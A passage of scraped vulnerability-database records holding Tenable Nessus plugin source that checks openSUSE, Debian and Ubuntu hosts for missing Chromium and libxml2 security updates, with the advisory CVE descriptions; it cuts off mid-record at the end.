"OPENSUSE-2016-900.NASL", "href": "https://www.tenable.com/plugins/nessus/92550", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-900.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92550);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2016-900)\");\n script_summary(english:\"Check for the openSUSE-2016-900 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chromium was updated to 52.0.2743.82 to fix the following security\nissues (boo#989901) :\n\n - CVE-2016-1706: Sandbox escape in PPAPI\n\n - CVE-2016-1707: URL spoofing on iOS\n\n - CVE-2016-1708: Use-after-free in Extensions\n\n - CVE-2016-1709: Heap-buffer-overflow in sfntly\n\n - CVE-2016-1710: Same-origin bypass in Blink\n\n - CVE-2016-1711: Same-origin bypass in Blink\n\n - CVE-2016-5127: Use-after-free in Blink\n\n - CVE-2016-5128: Same-origin bypass in V8\n\n - CVE-2016-5129: Memory corruption in V8\n\n - CVE-2016-5130: URL spoofing\n\n - CVE-2016-5131: Use-after-free in libxml\n\n - CVE-2016-5132: Limited same-origin bypass in Service\n Workers\n\n - CVE-2016-5133: Origin confusion in proxy authentication\n\n - CVE-2016-5134: URL leakage via PAC script\n\n - CVE-2016-5135: Content-Security-Policy bypass\n\n - CVE-2016-5136: Use after free in extensions\n\n - CVE-2016-5137: History sniffing with HSTS and CSP\n\n - CVE-2016-1705: Various fixes from internal audits,\n fuzzing and other initiatives\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=989901\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected Chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-desktop-kde\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-ffmpegsumo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/07/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"chromedriver-52.0.2743.82-61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"chromium-52.0.2743.82-61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"chromium-desktop-gnome-52.0.2743.82-61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"chromium-desktop-kde-52.0.2743.82-61.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"chromium-ffmpegsumo-52.0.2743.82-61.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromium / chromium-desktop-gnome / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:17", "description": "Several vulnerabilities have been discovered in the chromium web browser.\n\n - CVE-2016-1704 The chrome development team found and fixed various issues during internal auditing.\n\n - CVE-2016-1705 The chrome development team found and fixed various issues during internal auditing.\n\n - CVE-2016-1706 Pinkie Pie discovered a way to escape the Pepper Plugin API sandbox.\n\n - CVE-2016-1707 xisigr discovered a URL spoofing issue.\n\n - CVE-2016-1708 Adam Varsan discovered a use-after-free issue.\n\n - CVE-2016-1709 ChenQin discovered a buffer overflow issue in the sfntly library.\n\n - CVE-2016-1710 Mariusz Mlynski discovered a same-origin bypass.\n\n - CVE-2016-1711 Mariusz Mlynski discovered another same-origin bypass.\n\n - CVE-2016-5127 cloudfuzzer discovered a use-after-free issue.\n\n - CVE-2016-5128 A same-origin bypass issue was discovered in the v8 JavaScript library.\n\n - CVE-2016-5129 Jeonghoon Shin discovered a memory corruption issue in the v8 JavaScript library.\n\n - CVE-2016-5130 Widih Matar discovered a URL spoofing issue.\n\n - CVE-2016-5131 Nick Wellnhofer discovered a use-after-free issue in the libxml2 library.\n\n - CVE-2016-5132 Ben Kelly discovered a same-origin bypass.\n\n - CVE-2016-5133 Patch Eudor discovered an issue in proxy authentication.\n\n - CVE-2016-5134 Paul Stone discovered an information leak in the Proxy Auto-Config feature.\n\n - CVE-2016-5135 ShenYeYinJiu discovered a way to bypass the Content Security Policy.\n\n - CVE-2016-5136 Rob Wu discovered a use-after-free issue.\n\n - CVE-2016-5137 Xiaoyin Liu discovered a way to discover whether an HSTS website had been visited.", "cvss3": {}, "published": "2016-08-02T00:00:00", "type": "nessus", "title": "Debian DSA-3637-1 : chromium-browser - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1704", "CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1707", "CVE-2016-1708", "CVE-2016-1709", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5136", "CVE-2016-5137"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium-browser", "cpe:/o:debian:debian_linux:8.0"], "id": "DEBIAN_DSA-3637.NASL", "href": "https://www.tenable.com/plugins/nessus/92666", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3637. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(92666);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-1704\", \"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1707\", \"CVE-2016-1708\", \"CVE-2016-1709\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5136\", \"CVE-2016-5137\");\n script_xref(name:\"DSA\", value:\"3637\");\n\n script_name(english:\"Debian DSA-3637-1 : chromium-browser - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Several vulnerabilities have been discovered in the chromium web\nbrowser.\n\n - CVE-2016-1704\n The chrome development team found and fixed various\n issues during internal auditing.\n\n - CVE-2016-1705\n The chrome development team found and fixed various\n issues during internal auditing.\n\n - CVE-2016-1706\n Pinkie Pie discovered a way to escape the Pepper Plugin\n API sandbox.\n\n - CVE-2016-1707\n xisigr discovered a URL spoofing issue.\n\n - CVE-2016-1708\n Adam Varsan discovered a use-after-free issue.\n\n - CVE-2016-1709\n ChenQin discovered a buffer overflow issue in the sfntly\n library.\n\n - CVE-2016-1710\n Mariusz Mlynski discovered a same-origin bypass.\n\n - CVE-2016-1711\n Mariusz Mlynski discovered another same-origin bypass.\n\n - CVE-2016-5127\n cloudfuzzer discovered a use-after-free issue.\n\n - CVE-2016-5128\n A same-origin bypass issue was discovered in the v8\n JavaScript library.\n\n - CVE-2016-5129\n Jeonghoon Shin discovered a memory corruption issue in\n the v8 JavaScript library.\n\n - CVE-2016-5130\n Widih Matar discovered a URL spoofing issue.\n\n - CVE-2016-5131\n Nick Wellnhofer discovered a use-after-free issue in the\n libxml2 library.\n\n - CVE-2016-5132\n Ben Kelly discovered a same-origin bypass.\n\n - CVE-2016-5133\n Patch Eudor discovered an issue in proxy authentication.\n\n - CVE-2016-5134\n Paul Stone discovered an information leak in the Proxy\n Auto-Config feature.\n\n - CVE-2016-5135\n ShenYeYinJiu discovered a way to bypass the Content\n Security Policy.\n\n - CVE-2016-5136\n Rob Wu discovered a use-after-free issue.\n\n - CVE-2016-5137\n Xiaoyin Liu discovered a way to discover whether an HSTS\n website had been visited.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1704\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1705\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1706\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1707\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1708\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1710\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-1711\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5127\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5128\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5129\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5130\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5132\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5133\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5134\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5135\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5136\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2016-5137\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/chromium-browser\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2016/dsa-3637\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the chromium-browser packages.\n\nFor the stable distribution (jessie), these problems have been fixed\nin version 52.0.2743.82-1~deb8u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/07/31\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"chromedriver\", reference:\"52.0.2743.82-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium\", reference:\"52.0.2743.82-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-dbg\", reference:\"52.0.2743.82-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-inspector\", reference:\"52.0.2743.82-1~deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"chromium-l10n\", reference:\"52.0.2743.82-1~deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:19", "description": "Multiple security issues were discovered in Chromium. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit these to read uninitialized memory, cause a denial of service (application crash) or execute arbitrary code.\n(CVE-2016-1705)\n\nIt was discovered that the PPAPI implementation does not validate the origin of IPC messages to the plugin broker process. A remote attacker could potentially exploit this to bypass sandbox protection mechanisms. (CVE-2016-1706)\n\nIt was discovered that Blink does not prevent window creation by a deferred frame. A remote attacker could potentially exploit this to bypass same origin restrictions. (CVE-2016-1710)\n\nIt was discovered that Blink does not disable frame navigation during a detach operation on a DocumentLoader object. A remote attacker could potentially exploit this to bypass same origin restrictions.\n(CVE-2016-1711)\n\nA use-after-free was discovered in Blink. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer process crash, or execute arbitrary code. (CVE-2016-5127)\n\nIt was discovered that objects.cc in V8 does not prevent API interceptors from modifying a store target without setting a property.\nA remote attacker could potentially exploit this to bypass same origin restrictions. (CVE-2016-5128)\n\nA memory corruption was discovered in V8. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer process crash, or execute arbitrary code. (CVE-2016-5129)\n\nA security issue was discovered in Chromium. A remote attacker could potentially exploit this to spoof the currently displayed URL.\n(CVE-2016-5130)\n\nA use-after-free was discovered in libxml. If a user were tricked in to opening a specially crafted website, an attacker could potentially exploit this to cause a denial of service via renderer process crash, or execute arbitrary code. (CVE-2016-5131)\n\nThe Service Workers implementation in Chromium does not properly implement the Secure Contexts specification during decisions about whether to control a subframe. A remote attacker could potentially exploit this to bypass same origin restrictions. (CVE-2016-5132)\n\nIt was discovered that Chromium mishandles origin information during proxy authentication. A man-in-the-middle attacker could potentially exploit this to spoof a proxy authentication login prompt.\n(CVE-2016-5133)\n\nIt was discovered that the Proxy Auto-Config (PAC) feature in Chromium does not ensure that URL information is restricted to a scheme, host and port. A remote attacker could potentially exploit this to obtain sensitive information. (CVE-2016-5134)\n\nIt was discovered that Blink does not consider referrer-policy information inside an HTML document during a preload request. A remote attacker could potentially exploit this to bypass Content Security Policy (CSP) protections. (CVE-2016-5135)\n\nIt was discovered that the Content Security Policy (CSP) implementation in Blink does not apply http :80 policies to https :443 URLs. A remote attacker could potentially exploit this to determine whether a specific HSTS website has been visited by reading a CSP report. (CVE-2016-5137).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-08-08T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS / 16.04 LTS : oxide-qt vulnerabilities (USN-3041-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-1705", "CVE-2016-1706", "CVE-2016-1710", "CVE-2016-1711", "CVE-2016-5127", "CVE-2016-5128", "CVE-2016-5129", "CVE-2016-5130", "CVE-2016-5131", "CVE-2016-5132", "CVE-2016-5133", "CVE-2016-5134", "CVE-2016-5135", "CVE-2016-5137"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0", "cpe:/o:canonical:ubuntu_linux:14.04", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3041-1.NASL", "href": "https://www.tenable.com/plugins/nessus/92784", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3041-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(92784);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2016-1705\", \"CVE-2016-1706\", \"CVE-2016-1710\", \"CVE-2016-1711\", \"CVE-2016-5127\", \"CVE-2016-5128\", \"CVE-2016-5129\", \"CVE-2016-5130\", \"CVE-2016-5131\", \"CVE-2016-5132\", \"CVE-2016-5133\", \"CVE-2016-5134\", \"CVE-2016-5135\", \"CVE-2016-5137\");\n script_xref(name:\"USN\", value:\"3041-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS / 16.04 LTS : oxide-qt vulnerabilities (USN-3041-1)\");\n script_summary(english:\"Checks dpkg output for updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Ubuntu host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Multiple security issues were discovered in Chromium. If a user were\ntricked in to opening a specially crafted website, an attacker could\npotentially exploit these to read uninitialized memory, cause a denial\nof service (application crash) or execute arbitrary code.\n(CVE-2016-1705)\n\nIt was discovered that the PPAPI implementation does not validate the\norigin of IPC messages to the plugin broker process. A remote attacker\ncould potentially exploit this to bypass sandbox protection\nmechanisms. (CVE-2016-1706)\n\nIt was discovered that Blink does not prevent window creation by a\ndeferred frame. A remote attacker could potentially exploit this to\nbypass same origin restrictions. (CVE-2016-1710)\n\nIt was discovered that Blink does not disable frame navigation during\na detach operation on a DocumentLoader object. A remote attacker could\npotentially exploit this to bypass same origin restrictions.\n(CVE-2016-1711)\n\nA use-after-free was discovered in Blink. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer process crash,\nor execute arbitrary code. (CVE-2016-5127)\n\nIt was discovered that objects.cc in V8 does not prevent API\ninterceptors from modifying a store target without setting a property.\nA remote attacker could potentially exploit this to bypass same origin\nrestrictions. (CVE-2016-5128)\n\nA memory corruption was discovered in V8. If a user were tricked in to\nopening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer process crash,\nor execute arbitrary code. (CVE-2016-5129)\n\nA security issue was discovered in Chromium. A remote attacker could\npotentially exploit this to spoof the currently displayed URL.\n(CVE-2016-5130)\n\nA use-after-free was discovered in libxml. If a user were tricked in\nto opening a specially crafted website, an attacker could potentially\nexploit this to cause a denial of service via renderer process crash,\nor execute arbitrary code. (CVE-2016-5131)\n\nThe Service Workers implementation in Chromium does not properly\nimplement the Secure Contexts specification during decisions about\nwhether to control a subframe. A remote attacker could potentially\nexploit this to bypass same origin restrictions. (CVE-2016-5132)\n\nIt was discovered that Chromium mishandles origin information during\nproxy authentication. A man-in-the-middle attacker could potentially\nexploit this to spoof a proxy authentication login prompt.\n(CVE-2016-5133)\n\nIt was discovered that the Proxy Auto-Config (PAC) feature in Chromium\ndoes not ensure that URL information is restricted to a scheme, host\nand port. A remote attacker could potentially exploit this to obtain\nsensitive information. (CVE-2016-5134)\n\nIt was discovered that Blink does not consider referrer-policy\ninformation inside an HTML document during a preload request. A remote\nattacker could potentially exploit this to bypass Content Security\nPolicy (CSP) protections. (CVE-2016-5135)\n\nIt was discovered that the Content Security Policy (CSP)\nimplementation in Blink does not apply http :80 policies to https :443\nURLs. A remote attacker could potentially exploit this to determine\nwhether a specific HSTS website has been visited by reading a CSP\nreport. (CVE-2016-5137).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3041-1/\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected liboxideqtcore0 package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:liboxideqtcore0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/08/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/08/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2023 Canonical, Inc. / NASL script (C) 2016-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04|16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04 / 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.16.5-0ubuntu0.14.04.1\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"liboxideqtcore0\", pkgver:\"1.16.5-0ubuntu0.16.04.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"liboxideqtcore0\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:29:08", "description": "CVE-2016-4658 Namespace nodes must be copied to avoid use-after-free errors. But they don't necessarily have a physical representation in a document, so simply disallow them in XPointer ranges.\n\nCVE-2016-5131 The old code would invoke the broken xmlXPtrRangeToFunction. range-to isn't really a function but a special kind of location step. Remove this function and always handle range-to in the XPath code. The old xmlXPtrRangeToFunction could also be abused to trigger a use-after-free error with the potential for remote code execution.\n\nFor Debian 7 'Wheezy', these problems have been fixed in version 2.8.0+dfsg1-7+wheezy7.\n\nWe recommend that you upgrade your libxml2 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description block directly from the DLA security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-11-01T00:00:00", "type": "nessus", "title": "Debian DLA-691-1 : libxml2 security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4658", "CVE-2016-5131"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libxml2", "p-cpe:/a:debian:debian_linux:libxml2-dbg", "p-cpe:/a:debian:debian_linux:libxml2-dev", "p-cpe:/a:debian:debian_linux:libxml2-doc", "p-cpe:/a:debian:debian_linux:libxml2-utils", "p-cpe:/a:debian:debian_linux:libxml2-utils-dbg", "p-cpe:/a:debian:debian_linux:python-libxml2", "p-cpe:/a:debian:debian_linux:python-libxml2-dbg", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-691.NASL", "href": "https://www.tenable.com/plugins/nessus/94448", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-691-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(94448);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2016-4658\", \"CVE-2016-5131\");\n\n script_name(english:\"Debian DLA-691-1 : libxml2 security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a 